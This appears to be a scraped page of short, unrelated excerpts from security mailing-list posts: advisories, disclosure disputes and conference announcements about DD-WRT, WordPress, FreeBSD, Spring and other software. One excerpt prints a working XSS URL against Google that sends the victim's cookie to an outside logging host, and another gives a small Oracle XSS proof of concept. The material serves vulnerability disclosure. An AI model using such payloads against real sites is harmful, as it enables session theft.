
Re: Multiple XSRF in DD-WRT (Remote Root Command Execution)

> bitmage discovered that in every fresh release and every custom
> firewall two other rules are added in front of all.
> the rules will allow every service on the dd-wrt router from the ip
> 194.231.229.20 and from the ip 212.65.2.116
>   
This was removed a long time ago and both these IPs did not exist. I
also explained in the forum how this problem occurred.
> Some workarounds exist, I didn't test any of them, because dd-wrt isn't
> trustworthy anymore for me. I can confirm this flaw in the latest
> stable vpn release.
>   

DEF CON 16 Retro Announcement! Back to Bang!

DESCRIPTION:

So you're bored, and have never gone to a convention?  You want to meet all
the other members of the so called 'computer underground'?  You've been
calling BBS systems for a long time now, and you definitely have been
interacting on the national networks.  You've bullshitted with the best, and
now it's time to meet them in Vegas!  For me I've been networking for years,
and now I'll get a chance to meet everyone in the flesh.  Get together with
a group of your friends and make the journey.


Cross-Site History Manipulation (XSHM)

Checkmarx Research Labs has identified a new critical vulnerability in
Internet Explorer (other browsers are probably exposed the same way) that
would allow hackers to easily compromise web applications. Cross-Site
History Manipulation (XSHM) is a newly discovered zero-day attack: attackers
may have been using it for a long time, but the application and security
communities do not know it.

To help major browsers or application developers stop the proliferation of
this exploit, Checkmarx has published a guide to identify and remediate the
vulnerability. It can be downloaded at

Re: Puntal (index.php) Remote File Inclusion Vulnerabilities

> Both variables ($app_path and $puntal_path) are defined in the index.php
> file. As such they will never be overridden when the variables are passed
> via POST or GET. POST and GET variables are populated and placed into the
> global scope before the page is processed by the PHP processor engine
> (assuming register globals is enabled, which it hasn't been in a default PHP
> install in a long time).
> 
> Line 29 of index.php: $app_path = '/';
> Line 41 of index.php: $puntal_path = dirname(__FILE__).$app_path;
> 
> Additionally the following line (Line 43 of Index.php) calls a function

Day of bugs in WordPress 2

in September 2008,  Day of bugs in browsers in September 2008 and Day of
bugs in browsers 2: reloaded in October 2008. And now the time has come for
new project.

I conducted the project Day of bugs in WordPress
(http://websecurity.com.ua/1685/) on 30.12.2007 and had planned a new
project a long time ago, but only now found the time. In that project
I disclosed 81 vulnerabilities - these are Arbitrary file edit
(http://websecurity.com.ua/1686/), Local File Include, Directory Traversal
and Full path disclosure (http://websecurity.com.ua/1687/) vulnerabilities.
Among them there are 49 Full path disclosure, 1 Arbitrary file edit and 31

ToorCon 11 Preliminary Lineup Announced!

Software Defined Radio (SDR) techniques are rapidly becoming essential to all areas of wireless security research. Recent attacks on Bluetooth, GSM, wired and wireless keyboards, implantable medical devices, RFID, and more have been made possible by software radio. A combination of lectures, software exercises, and over-the-air projects, this workshop will provide the hands-on background in digital signal processing and radio engineering required to apply software radio techniques to practical hacking of diverse wireless systems. If you have experience developing software but lack experience with radio technology and digital signal processing, this workshop is for you.

Application Security Workshop
Instructor: Jared DeMott
Includes: CD with VMWare images and printed training materials
There are four technical skills required by security researchers, software quality assurance engineers, or developers concerned about security: Source code auditing, fuzzing, reverse engineering, and exploitation.  All these skills and more are covered.  C/C++ code has been plagued by security errors resulting from memory corruption for a long time.  Problematic code is discussed and searched for in lectures and labs, with WebGoat introduced as well.  Fuzzing is a topic book author DeMott knows about well.  Mutation file fuzzing and framework definition construction (Sulley and Peach) are just some of the lecture and lab topics.  When it comes to reversing C/C++ (Java and others are briefly discussed) IDA pro is the tool of choice.  Deep usage of this tool is covered in lecture and lab.  Exploitation discussions and labs are the exciting final component.  You’ll enjoy exploiting BSD local programs to Vista browsers using the latest techniques.

Web and Cloud Application Security Workshop
Instructor: Andre Gironda
Includes: Printed workbook, Build/setup/use of a virtual infrastructure
This cloud-web application security workshop covers web applications in various virtual infrastructures, primarily focused on defense, compliance, and incident response. First, we'll identify applications as if they had already been attacked. Then, we'll come up with a risk management plan based on incident data, compliance/regulations, as well as data classifications. We'll look at full-knowledge verification using web server configuration and content files, in addition to runtime and source code verification. We'll go over the various implications of pen-testing cloud-web applications. This will include a thorough look at the strengths and weaknesses of web application firewalls and application hardening practices. Finally, we'll perform mock verifications and discuss partnering with application developers.

RE: Puntal (index.php) Remote File Inclusion Vulnerabilities

Both variables ($app_path and $puntal_path) are defined in the index.php
file. As such they will never be overridden when the variables are passed
via POST or GET. POST and GET variables are populated and placed into the
global scope before the page is processed by the PHP processor engine
(assuming register globals is enabled, which it hasn't been in a default PHP
install in a long time).

Line 29 of index.php: $app_path = '/';
Line 41 of index.php: $puntal_path = dirname(__FILE__).$app_path;

Additionally the following line (Line 43 of Index.php) calls a function

Re: Multiple XSRF in DD-WRT (Remote Root Command Execution)

anymore. it seems that chris implemented this for a customer. i
removed it now" (they are still in the default install image)
"nvram unset ral
nvram commit "
"there is no security hole. both ip's are not active anymore and
obsolete since a long time. "
"i will lock this thread now. a new release is scheduled soon (within
this or next week), but you cannot force me to release buggy code
based on the current internal tree.thats my last statement on this
topic" (Posted: Tue Aug 19, 2008 10:57 pm)

XSS in XP Book version 3.0

Hello , 

I haven't sent any new bugs for a long time :)

Vulnerable : XP Book v3.0
coded by http://kuwaitiphp.alruban.net 
* i think their website doesn't work at the moment 

exploit :
open http://www.example.com/xpbook/entry.php

DUC NO-IP Local Password Information Disclosure Vulnerability

 *
 * Synopsis: DUC NO-IP is prone to an information disclosure vulnerability due to a design error.
 *           Attackers can exploit this issue to obtain sensitive information including tray password,
 *           web username, password and hostnames that may lead to further attacks.
 *            
 * Note: Vendor has been notified long time ago confirming a design error.
 * Vendor site: http://www.no-ip.com
 *           
 */

using System;

n.runs-SA-2008.001 - Jscape Secure FTP Applet

  2008/02/25   n.runs notifies Jscape that an advisory will be released by
               the end of the week if they do not patch the flaw n.runs
               reported roughly 2 years ago.
               "Given the long time this has already been reported (12/2006),
               and the criticality of this issue, I would expect a patch to be
               ready by the end of the week. If the patch is not available
               until

Multiple denial of service in Soldat 1.4.2/2.6.2

------------------
C] easy IP banning
------------------

This is a problem that has affected Soldat for a long time; the bug is
simply the lack of a real check on the players who join the server, so
a single UDP packet is enough to be inside it.
While in the past the banning happened with malformed packets (I wrote
a PoC for it), in recent versions it is possible to exploit this
problem by sending multiple join packets, causing a ban of 20 minutes

Re: DoS vulnerabilities in Firefox, Internet Explorer, Chrome and Opera

> released a patch for it (which was a serious approach, but neither Microsoft
> for IE, nor other vendors use such an approach for DoS holes in browsers).
>
> But take into account that I informed (at 26.05.2010) all four browser
> vendors about many vulnerabilities, which I'll disclose in the future. So
> they are informed for a long time in advance :-). And so you have no need to
> worry, because with every day they become more and more "informed a long
> time ago" and have more and more days to fix these holes.
>
> Best wishes & regards,

CVE-2009-1190: Spring Framework Remote Denial of Service Vulnerability

  }
  System.arraycopy(longerPattern.getBytes(), 0, theArray, i, length);

  ByteArrayInputStream bis = new ByteArrayInputStream(theArray);
  ObjectInputStream ois = new ObjectInputStream(bis);
  Object o = ois.readObject(); // returns after a very very long time

 }
}

Credit:

ERRATA - n.runs-SA-2008.001 - Jscape Secure FTP Applet

   2008/02/20   Jscape promises to "continue to look into this issue and
                notify you when a patch is available".
   2008/02/25   n.runs notifies Jscape that an advisory will be released
                by the end of the week if they do not patch the flaw
                n.runs reported roughly 2 years ago.
                "Given the long time this has already been reported
                (12/2006), and the criticality of this issue, I would
                expect a patch to be ready by the end of the week. If the
                patch is not available until the end of this week
                (29.02.2008) I'll proceed with the advisory"
   2008/02/29   Jscape notifies n.runs that the flaw has been patched

OSSTMM 3 STAR Released!

and rav formula, we have released them separately here:

http://www.isecom.org/ravs/

There are more details at the site about Attack Surface metrics.
This is the core of the stuff we've been talking about for a long time
as a game-changer to the current guessing problem of the risk models.
This works where risk fails.

Enjoy!


Universal XSS in all Google Services

A more real-world example, where an attacker silently transfers your Google.com cookie to his or her evil site:

http://google.com/support/webmasters/bin/answer.py?answer=34575&cbid=-1oudgq5c3804g';ifr=document.createElement('iframe');ifr.src='http:'+'//www.securethoughts.com/security/cookielogger/log.cgi?cookie='+escape(document.cookie);document.body.appendChild(ifr);//src=cb&lev=index

I would like to thank the Google Security Team for their prompt responses and for fixing this serious issue in a timely manner. If you think Google took a long time to fix this vulnerability, think again. This python script is used in a lot of places. Try this Google Dork to see the usage of this script in almost all Google Services.



BugTracker.net 3.4.3 SQL Injection

The application allows the use of Custom Fields, searching
of these custom fields is possible on the search page.
The value used for searching the custom field is not
properly cleaned before being used in the SQL query.

Please note that this vulnerability has been in the code for a long time;
if you are using BugTracker.NET publicly you could be vulnerable.

IV. SAMPLE CODE
_______________


Rapid7 Advisory R7-0032: Microsoft Internet Explorer FTP Command Injection Vulnerability

Hello ml,

I would like to point out that this vulnerability (Microsoft Internet
Explorer FTP Command Injection Vulnerability)
was published a long time ago; here is the advisory:
http://www.securityfocus.com/archive/1/383722

Cheers,



[SECURITY] [DSA-1975-1] Security Support for Debian 4.0 to be discontinued on February 15th

One year after the release of Debian GNU/Linux 5.0 alias 'lenny' and
nearly three years after the release of Debian GNU/Linux 4.0 alias
'etch' the security support for the old distribution (4.0 alias
'etch') is coming to an end next month.  The Debian project is proud
to be able to support its old distribution for such a long time and
even for one year after a new version has been released.

The Debian project has released Debian GNU/Linux 5.0 alias 'lenny' on
the 14th of February 2009.  Users and Distributors have been given a
one-year timeframe to upgrade their old installations to the current

[DEMO] Sample videos about IDS/IPS evasions...

exploits"), and became a methodology in 2009 ("The Departed: Exploit Next
Generation - The Philosophy"). 
        . ENG++ became a methodology when I decided to port it to work
with/to any open exploit development framework, i.e., Metasploit Framework.
        . Ported means that ENG++ has been developed for a long, long, long
time, so just some modules are working on Metasploit Framework, to release
some of its examples and to help people understand that really cool stuff
can be done when you are innovating and creating.

In a few words: Exploit Next Generation® Compliance Methodology is not the
same thing as Advanced Evasion Techniques (ENG++ != AET).

HTC Touch vCard over IP Denial of Service

tones) will be played upon incoming messages, making the attack more
silent and less noticeable by a user.

Battery removal may be needed, in some cases, for restoring normal
functionalities.
Manual deletion of all received SMS requires a very long time, making
the deletion of all the SMS the most viable option, but leading to loss
of all received SMS and requiring in any case a large amount of time
(even hours).
The faster option for restoring the device is performing a hard reset of
the device, leading to the loss of all the content saved on the handset.

phpList <= 2.10.8 Local File inclusion

if (!ini_get("register_globals") || ini_get("register_globals") == "off") {
   # fix register globals, for now, should be phased out gradually
   # sure, this gets around the entire reason that register globals
   # should be off, but going through three years of code takes a long time....

   foreach ($_REQUEST as $key => $val) {
     $$key = $val;
   }
}

Re: Multiple XSRF in DD-WRT (Remote Root Command Execution)

> anymore. it seems that chris implemented this for a customer. i
> removed it now" (they are still in the default install image)
> "nvram unset ral
> nvram commit "
> "there is no security hole. both ip's are not active anymore and
> obsolete since a long time. "
> "i will lock this thread now. a new release is scheduled soon (within
> this or next week), but you cannot force me to release buggy code
> based on the current internal tree.thats my last statement on this
> topic" (Posted: Tue Aug 19, 2008 10:57 pm)
>

Re: facebook 'routing flaw'?

However, having a web browser based session, and a phone browser based 
session, doesn't seem to matter to facebook and I can have both open at 
the same time. There seems to be some potential to exploit there.

-Manny
(long time subscriber, but haven't posted since the late 90s)

On 1/16/2010 4:39 AM, Michael Scheidell wrote:
> AP Report says it was a 'routing problem'? any idea what they are
> talking about, do THEY know what they are talking about?
> Did AT&T mix up the destination ip addresses? did facebook NOT CHECK IP

** FreeBSD local r00t zeroday

Nov 2009 "BiG TiME"

"Go fetch your FreeBSD r00tkitz" // http://www.youtube.com/watch?v=dDnhthI27Fg

There is an unbelievably simple local r00t bug in recent FreeBSD versions.
I audited FreeBSD for local r00t bugs a long time ago *sigh*. Now it pays off.

The bug resides in the Run-Time Link-Editor (rtld).
Normally rtld does not allow dangerous environment variables like LD_PRELOAD
to be set when executing setugid binaries like "ping" or "su".
With a rather simple technique rtld can be tricked into

AST-2009-005: Remote Crash Vulnerability in SIP channel driver

   |             | an attacker may exhaust stack memory in the SIP stack    |
   |             | network thread by presenting excessively long numeric    |
   |             | strings in various fields.                               |
   |             |                                                          |
   |             | Note that while this potential vulnerability has existed |
   |             | in Asterisk for a very long time, it is only potentially |
   |             | exploitable in 1.6.1 and above, since those versions are |
   |             | the first that have allowed SIP packets to exceed 1500   |
   |             | bytes total, which does not permit strings that are      |
   |             | large enough to crash Asterisk. (The number strings      |
   |             | presented to us by the security researcher were          |

Re: [Full-disclosure] XSS in Oracle default fcgi-bin/echo

> The mere mention of fcgi-bin/echo in your first mail is enough for anybody
> to derive the PoC. Here's what I found in under a minute:
> */fcgi-bin/echo/<script>aler('xss')</script>*

Sorry, that is a different issue: the one you mention was patched by
Oracle a long time ago. (All the fcgi-bin/echo that I tested, were
already patched against the one you mention, but vulnerable to that
other I found.)

Cheers, Paul

Copyright © 1995-2012 LinuxRocket.net. All rights reserved.